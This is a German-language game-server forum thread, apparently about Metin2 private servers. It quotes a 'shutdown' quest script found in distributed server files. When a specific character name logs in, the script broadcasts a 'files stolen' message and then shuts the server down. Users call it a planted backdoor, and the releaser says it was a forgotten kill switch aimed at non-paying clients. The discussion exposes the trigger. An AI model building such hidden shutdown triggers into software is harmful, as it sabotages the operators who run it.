Quote:
Originally Posted by Wentworth Miller
PHP Code:
quest shutdown begin state start begin when login with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown1", 3) end when shutdown1.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown2", 3) end when shutdown2.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown3", 3) end when shutdown3.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown4", 3) end when shutdown4.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown5", 3) end when shutdown5.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown6", 3) end when shutdown6.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown7", 3) end when shutdown7.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") timer("shutdown8", 3) end when shutdown8.timer with pc.get_name() == "x112x" begin command("n Serverfiles Geklaut von .Kay331!!!") command("n Server wird Heruntergefahren ;)") timer("shutdown9", 3) end when shutdown9.timer with pc.get_name() == "x112x" begin command("kaaydown") end end end
Diese Quest ist ja mal interessant.
|
ohh, ja kannst du rauslöschen hatte die mal drinne, wenn ich root server
eingerichtet hatte und denn jemand meinte nicht bezahlen zu müssen;)
Quest war nicht beabsichtigt, wollte damit keine Lücke einbauen weil die quest
heißt auch schon shutdown.quest wäre ich ja schön blöd ;)
Quote:
Originally Posted by CanyX
hätte ich nicht von dir gedacht Kay :facepalm:
|
Wie gesagt war nicht beabsichtigt.. habe echt nicht mehr dran gedacht das die
Quest noch vorhanden ist..
Quote:
Originally Posted by .2good4you111
Haha wannabe-1337-h4xx0r
@TE
--> Falls beabsichtig:
Lass mich raten wiso du das gemacht hast...
Überall liest man das Server gehackt wurden durch unzureichende Absicherung des Servers/Homepage. Natürlich willst du das auch können, schaffst es jedoch nichtmal annähernd auch nur ne kleine Lücke zu finden. Also geben wir eben Files mit paar Lücken raus, durch die Quests siehts natürlich aus als würdest du als GM rumspammen, wirst "fame" da die Files von dir sind und kannst sagen du hast den Server gehackt.
Naja ich hoffe du hackst mich jetzt nich wegen meinem Kommentar.
Bin mir ziemlich sicher das da noch´n paar Lücken drinnen sind.
Else, sorry :D
|
... wie schon gesagt hatte die Quest drinne weil ich roots eingerichtet habe
und einige Leute wollten einfach nicht bezahlen?!
Außerdem wenn man ein bisschen das questen kann sieht man auf den ersten
Blick das die Quest nicht geht wenn man kein GM ist ..
Ja klar ich bau nur Lücken ein und habe es auch so nötig, sagt mal wie
tief sind hier einige gesunken?!